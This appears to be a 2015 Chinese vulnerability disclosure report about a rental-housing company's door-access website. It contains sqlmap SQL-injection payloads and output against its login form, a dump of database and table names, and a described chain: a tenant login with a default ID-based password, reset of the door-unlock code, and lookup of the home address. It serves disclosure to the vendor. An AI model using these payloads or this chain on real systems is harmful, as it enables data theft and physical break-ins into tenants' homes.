2015-11-06: 细节已通知厂商并且等待厂商处理中 2015-11-06: 厂商已经确认,细节仅向厂商公开 2015-11-16: 细节向核心白帽子及相关领域专家公开 2015-11-26: 细节向普通白帽子公开 2015-12-06: 细节向实习白帽子公开 2015-12-21: 细节向公众公开
某天看到青客业务员发的微信,提供了在线开门业务。青客的开门业务,简直防不胜防!再次感觉自己住的地方没有门!没有门!没有门!问了下前青客员工,一个片区的大门密码都是一样的··
站点
http://km.qk365.com/
POST注入
sqlmap identified the following injection points with a total of 932 HTTP(s) requests:---Place: POSTParameter: txt_Password Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111&txt_Password=111111' AND 4655=CONVERT(INT,(CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) (SELECT (CASE WHEN (4655=4655) THEN CHAR(49)ELSE CHAR(48) END)) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58))) AND 'gGri'='gGri&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111&txt_Password=111111' UNION ALL SELECT CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) CHAR(105) CHAR(106) CHAR(110) CHAR(118) CHAR(69) CHAR(122) CHAR(78) CHAR(109) CHAR(72) CHAR(118) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R Vector: UNION ALL SELECT [QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--Place: POSTParameter: txt_Code Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111' AND 9345=CONVERT(INT,(CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) (SELECT (CASE WHEN (9345=9345) THEN CHAR(49) ELSE CHAR(48) END))CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58))) AND 'yTLA'='yTLA&txt_Password=111111&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R Vector: AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b rTX22oGpB3az Q5MK&txt_Code=1111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(58) CHAR(122) CHAR(117) CHAR(116) CHAR(58) CHAR(111) CHAR(101)CHAR(118) CHAR(67) CHAR(113) CHAR(117) CHAR(78) CHAR(109) CHAR(119) CHAR(113) CHAR(58) CHAR(110) CHAR(120) CHAR(119) CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL-- &txt_Password=111111&imageField.x=22&imageField.y=15&__EVENTVALIDATION=/wEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e R Vector: UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL-----there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: txt_Code, type: Single quoted string (default)[1] place: POST, parameter: txt_Password, type: Single quoted string[q] Quit
获取的数据库
available databases [27]:[*] 20141231[*] master[*] model[*] msdb[*] new_0430[*] new_HouseRent[*] new_HouseRent_20141130[*] new_HouseRent_20141201[*] new_HouseRent_20141228[*] new_HouseRent_20150119[*] new_HouseRent_20150120[*] new_HouseRent_20150205[*] new_HouseRent_20150301[*] new_HouseRent_20150306[*] new_HouseRent_20150325[*] new_HouseRent_20150401[*] new_HouseRent_20150405[*] new_HouseRent_20150501_0[*] new_HouseRent_20150605[*] new_HouseRent_20150731[*] new_HouseRent_20150930[*] ReportServer[*] tempdb[*] tmp_1018[*] tmp_1019[*] tmp_1020[*] tmp_111
当前用户、当前数据库和权限
current user: 'sa'current database: 'new_HouseRent'
看看当前数据库的表
A8_office_expense A8_office_expense_04_22 A8_reimburse_detail A8_reimburse_detail_04_22 A8_reimbursement A8_staff_salary A8_staff_salary_04_22 A8_staff_salary_0615 A_NC_Financing A_NC_Financing_copy A_NC_Financing_copy1 A_NC_Financing_copy2 A_NC_Financing_copy3 A_NC_Init A_NC_Temp A_NC_Temp_copy A_NC_Temp_copy1 A_NC_Temp_copy2 A_NC_Temp_copy3 Area Area_bak Area_copy Audit_Activities BBS Balance Bank Base_Type Bill_Manage Bill_Petty_Mapping Binding_Rooms Black_List Book BookPay BusinessMan Bxw_Room CM_Box CM_DoorLock CM_Package CM_Record CM_Repair CM_Temp_Auth CM_User_Lock CM_User_Lock_Card CUT_Balance_Oper_Log CX_Operation_Log Cashier_Detail Cashier_Records Cell_Area Cell_Area_ls Cell_Photo Cell_Photo_copy Cell_Photo_ls Cells_Profits Center_Month_Target Clue_Sales_Check Company_Month_Settting Contract Contract_Mapping Contract_copy Copy_Power_Consumption Copy_Water Country Coupons_Activities Customer_Account Customer_Book Customer_Cell Customer_Cell_copy Customer_Equepment_Detail Customer_Loan_Apply Customer_Order Customer_Owen Customer_Private Customer_Register Customer_Register_Extra Customer_Repayment_plan Customer_Tenant Customer_Tenant_Account Customer_Tenant_RentMatch Deposit_Lock DoorBox_Log Door_Log Door_People Door_Power Enterprise_Customers Equipment Equipment_Mapping Expenditure_Item Expenditure_Item_Check Expenditure_Item_copy Expenses_Config Expenses_Config_Mapping FamilyName Fill_Info Human_Cost Info_Position LandMark LandlordChanageLog LandlordChanageLog_0402 LandlordChanageLog_0403 LandlordChanageLog_0429 LandlordChanageLog_0504 LandlordChanageLog_20150617 LandlordChanageLog_43 LandlordChanageLog_bak0617 Loan_RenRen Maintenance_Count Management_Cost Member Member_Satisfy Member_Statistical_Report Message_Board Meter_Box Meter_Collector Meter_Operation Meter_Operation_Debug Meter_Package Meter_Repair NC_Cell_2013 NC_Cell_2014 NC_Room NC_Room_2013 NC_Room_HadVipOther NC_Room_HadVipOther_2013 NC_Room_Rent NC_Room_Rent_2013 Nationality OperateLog Ower_Contract Ower_Repayment_Plan Param_Customer_Discount Param_Sign_Type Pay PayBill_NC PayBill_OA PayMent Pay_Type Pay_detailed_bill Payment_Landlord Petty_Expenses Petty_Expenses_20150328 Petty_Item Portal_SMS Project Project_new Promotion_Activity Promotion_Activity_Coupons Promotion_Activity_Coupons_Relation Provincial ROM_Level_Update Recharge_List Recharge_Note Recharge_Transaction Recharge_Transaction_201510111907_copy |Recharge_Transaction_201510121239 Recharge_Transaction_copy Recommend_Type RenRen_Record Rent_ForOwners Rent_Increase Room Room_FixPrice_Log Room_Pricing_Log Room_Statistical_Report Room_Sublet Room_copy20150617 Rpt_Achievements_05 Rpt_Achievements_06 Rpt_Area_Fee Rpt_Area_Fee_04_22 Rpt_Area_Fee_1 Rpt_Area_Fee_2 Rpt_BeforRent_House_Detail Rpt_Caution_Kpi_Total Rpt_Caution_Kpi_Week Rpt_Center_NewContract Rpt_Complaint_Customer_Detail Rpt_Cost_Config Rpt_Cost_Ratio Rpt_Customer_CostList Rpt_Day_Report Rpt_Decorated_House_Detail Rpt_Event_Kpi_Detail Rpt_Expire_Customer_Detail Rpt_Full_Customer_Detail Rpt_Full_Customer_Detail_Sub Rpt_Full_House_Detail Rpt_Human_Cost Rpt_Kpi_Type Rpt_Month_Share Rpt_Month_Share_04_22 Rpt_Month_Share_1 Rpt_Month_Share_2 Rpt_Month_Share_old Rpt_New_Customer_Detail Rpt_Non_Area_Fee Rpt_Non_Area_Fee_With Rpt_Nonormal_Checkout_Detail Rpt_Operation_Week_Report Rpt_Ower_FullHouse Rpt_Process_Month_Report Rpt_Procurement_Kpi_Detail Rpt_Recharter_House_Detail Rpt_Regular_Customer_Detail Rpt_Repair_Fee Rpt_Repair_Fee_04_22 Rpt_Repairs_Customer_Detail Rpt_Room_AdminIncome Rpt_Room_AdminMonthIncome Rpt_Room_Income Rpt_Room_Income_With Rpt_Room_Income_With_04_22 Rpt_Room_Income_With_1 Rpt_Room_Income_With_2 Rpt_Room_Month Rpt_Room_Month_04_22 Rpt_Room_Month_1 Rpt_Room_Month_2 Rpt_Room_Month_Detail Rpt_Room_Month_Detail_04_22 Rpt_Room_Month_Detail_1 Rpt_Room_Month_Detail_2 Rpt_Room_Month_Detail_Sub Rpt_Room_Month_Detail_Sub_04_22 Rpt_Room_Month_Detail_Sub_1 Rpt_Room_Month_Detail_Sub_2 Rpt_Room_Month_Detail_old Rpt_Room_Month_old Rpt_Sale_Befor_Rent_House Rpt_Sale_Commission Rpt_Sale_Commission_04_22 Rpt_Sale_Commission_20150115 Rpt_Sale_Commission_copy Rpt_Sale_Contract_Commission Rpt_Sale_Contract_Commission_04_22 Rpt_Sale_Contract_Commission_20150115Rpt_Sale_Contract_Commission_copy Rpt_Sale_Full_House Rpt_Sale_House_Detail Rpt_Sale_Locked_House Rpt_Sale_RoomAdmin_Performance Rpt_Sale_RoomAdmin_Performance_04_22 Rpt_Sale_RoomAdmin_Performance_1 Rpt_Sale_RoomAdmin_Performance_2 Rpt_Sale_RoomAdmin_Performance_old Rpt_Sale_Total_Commission Rpt_Sales_Kpi_Detail Rpt_Service_Week_Setting Rpt_Unit_Clean Rpt_Week_Objective_Setting SMS_Announcement SMS_Announcement_Mapping Sales_Check Sales_Deal_Judge Sales_Month_Report Sales_Promotion Sales_Promotional_Allowances Sales_Visit_Customer Service_Center_Profit Sheet1 Sig_Approval_Option Sig_Approval_Option_copy Sig_Area Sig_Area_Breakdown Sig_Audit_Log Sig_Bill_Manage Sig_Collection_Detail Sig_Collection_Memory Sig_House_Allocation Sig_House_Change Sig_Petty_Expenses Sig_Room_Book Sig_Room_Change Sig_Room_CheckIn Sig_Room_CheckOut Sig_Room_Inspection Sig_Room_Renewal Sig_Room_Transition Sig_Sales_Check Sig_WaterPower_Record Since_the_increase Sincerity_Detail Solid_Ticket Syn_OA_Electric Sys_Config TEST_AREA Take_Cash_Apply Tariff_Packages Tariff_Packages_Mapping Tax_Cost Test_Lib Test_Lib_Mapping Total_Profits VFDXX VRCCX VRCCXFD VRCFWTGZJ V_ATM_QueryNumber V_Announcement_List V_App_Instatll V_AreaCustomerCell V_Area_List V_Atm_BalanceList V_Atm_CutBillList V_Atm_CutBillList_Unpay V_Atm_MeterOperation V_Atm_NewRoomList V_Atm_RoomCheckList V_Atm_RoomDetail V_BalanceDetail_List V_BillDetail V_BillDetail_List V_BillList V_BillPay_List V_BillPettyMapping V_BillRechargePayType V_BillSigCheckIn_List V_BillSigRoomChange_List V_BillSigRoomRenwal_List V_Bill_ExpeItem_List V_Bill_List V_Bill_Manage_AUTO2NC V_Bill_Manage_Collection_List V_Bill_Manage_List V_BingdingRoom V_BookRoom_List V_CMBox_List V_CX_AreaList V_CancelRoom_List V_Cashier_Atm V_Cashier_detail V_Cell_List V_Cell_rom_owner V_CellsProfit V_CheckOut_Contract_Detail V_Collection_List V_Collection_List_2 V_Collection_List_renren V_Collection_List_renren_2 V_Contract_CheckIn V_Contract_Confirmation V_Contract_List V_CustomerAccountList V_CustomerCell_Address V_CustomerOwen_List V_CustomerTenant_Lock V_Customer_Book_List V_Customer_LiveInfo V_Customer_O_List V_Customer_Owen V_Customer_Owen_For_NC V_Customer_RoomPrice V_Customer_T_List V_Customer_Tenant_For_NC V_Customer_Tenct_Room V_Customer_Tenct_Room_Now V_CutBillList V_CutBillList_Pay V_CutBillList_Unpay V_CutBilllist_UnpayType2 V_Depart V_Door V_ExpenditureItem_List V_Expire_Customer V_Fee_Print V_FindBill V_FindBillDetail V_FindFrontMoney V_FindReceipt V_FindSigning_List V_Find_AreaList V_Find_CRMRoom V_Find_CustomerTenantInfo V_Find_HWUser V_Find_RoomAdmin V_Function V_Intermediary_Fee V_LateClose V_Late_Customertenct_Room V_Late_Room_Month V_LoanApply_List V_LoanApply_OperList V_LoanApply_OperList_2 V_LoanApply_Print_List V_LoanApply_Print_List_2 V_Mem_CellRomOwner V_Mem_CutBillList V_Mem_CutmsgBoard V_Mem_DoorCardValid V_Mem_FindReceipt V_Mem_Info V_Mem_NeighborInfo V_Mem_NoticeList V_Mem_RoomList V_Mem_Sublet V_Mem_UserArea V_Member_Satisfy V_Men_QueryBill V_MessageBoard_List V_MeterCollector_List V_MeterOperation_List V_Month_Cell V_Month_SalesManage V_NCFinnance V_NC_Advance V_NC_CustomerAddress V_NC_Finnance V_NcBillInfo V_Nc_Bill_RMB_sum V_NewOverallRoom_List V_NewRoomDetail V_NewRoom_List V_OrderInfo V_Ower_PayBill V_OwnerContract_List V_PayBill_OA_AUTO2NC V_Petty_List V_Position V_Power_Total V_Province_City_Area V_Provincial_Village_Cell V_RC V_RechareNote_Month V_RechareNote_Room V_Rechare_Detail V_Rechare_Pay_Month V_Recive_Other_Detail V_Rent_Cell_Month V_Rent_Statistics_List V_Rent_Statistics_List_New V_RoomBillList V_RoomBook V_RoomDetail V_RoomMeterBox V_RoomPrice_Contrast_List V_Room_List V_Room_Nodelete V_Roomdoorbox V_Roomdoorsendresult V_Roommetersendresult V_Rpt_Area_Office_Fee V_Rpt_Area_Performance_Share_Month V_Rpt_Commision_Total V_Rpt_Commision_Total_Manager V_Rpt_Contract_List V_Rpt_Income V_Rpt_Insert_Customer_CostList V_Rpt_Report_AdminMonthYearTotal V_Rpt_Report_YerTotal V_Rpt_RoomAdmin_Sub V_Rpt_Room_Month V_Rpt_Sale_Gross_Profit V_Rpt_Sale_Gross_Profit_2 V_Rpt_Sale_Gross_Profit_3 V_Rpt_Sale_Gross_Profit_4 V_Rpt_Sale_Gross_Profit_5 V_Rpt_Sale_Gross_Profit_6 V_Rpt_Sale_RoomAdmin_Performance V_Rpt_officeFeeDtail V_Sale_Center_Manage_Report V_Sale_Contract V_Sale_Deal_Judge V_Sale_Performance_Report V_Sale_Room_Check_list V_Sale_StewardReport V_Sale_StewardReportFGW V_Sale_center_report V_Sig_House_Change V_Sync_CustomerTenantBaseInfo V_TblUser_position V_Test V_ThreePromotionActivity V_Tmp_DupBill V_Tmp_DupBill2 V_TobeRecommend V_TwoPromotionActivity V_UnRegisterCollection_List V_UnRegisterCollection_List_2 V_UserArea V_UserFunction V_UserRoleFunction V_User_PositionTitle V_Zujin_Cell V_check_cus_bill_tmp V_mem_CutBillList_Unpay V_mem_PaidBillList V_reimburse_Room V_room_recomm Varea VareaForAll VareaForRent VareaforPermisson VcontaractDetail VcontractMapping VforRentReserve VforRentReserveWait Village_Qk Vmessage Voucher VoucherType VroomContract VsalesOn Water_Detail Water_Fee Water_History WebService_Account Weights WiredLog WiredLog_201510302048 Wireless_Log YHQ_Email_Name A8_reimbursement_04-22 Rpt_Process_Month_Report_11-1 a ads agency_account app_login_source caiwu_hedui caiwu_hedui_zfb caiwu_wy caiwu_zfb check_door_info_tmp deliverstate fangyuan_refresh houseinfo_linshi link_road makeBillParamView post_history post_room rn_Bim_Id road room_check_detail room_check_log room_operate_log room_photo room_recomm sendlog smgpchannel solution_person sqlmapoutput subway sysdiagrams t_village_58_mapping t_village_hizhu taobao_order taobaoactivity tbl_Civil tbl_Company tbl_ControlField tbl_Department tbl_Function tbl_Function_Permission tbl_Group tbl_Group_Role tbl_Log tbl_Permission tbl_Position tbl_Role tbl_RoleField tbl_RoleFieldValue tbl_Role_Permission tbl_User tbl_UserArea tbl_UserField tbl_UserFieldValue tbl_User_20151103102548 tbl_User_Group tbl_User_Permission tbl_Value_Permission temp temp2 third_token tmp_a user_Address v_mem_paidlist_summary v_reminder_waterpower_list village vw_Permission vw_User_Permission xiachen_tmp_bak xiaoqu_58
用户的表为
Customer_Tenant
查询下数量
sqlmap读取第一个用户的信息,log日志里面如下
直接用这个用户的账号(身份证),密码(默认密码身份证后6位)登录。登录成功后,这里即可重置开门密码
配合个人网站精确定位到物理地址(居住地址)
http://m.qk365.com/
账号密码通用,直接登录,下面这个url里面有用户居住地址。http://m.qk365.com/admin/contract/stayAgreement.jsp
凑齐了开门密码和居住详细地址,绕过大门即可进屋了。(然后又可耻的问了下,一个片区的大门密码居然是通用的!!)
我住的地方没有门!我住的地方没有门!我住的地方没有门!好吧,不调皮了。其实漏洞早发现了,一开始是OA系统的万能密码一直没提交,昨天看到别人提交了,赶紧提出来了吧。检测非法用户,检测shell,排除后门~
危害等级:高
漏洞Rank:10
确认时间:2015-11-06 18:59
非常感谢,已经安排紧急修复
暂无
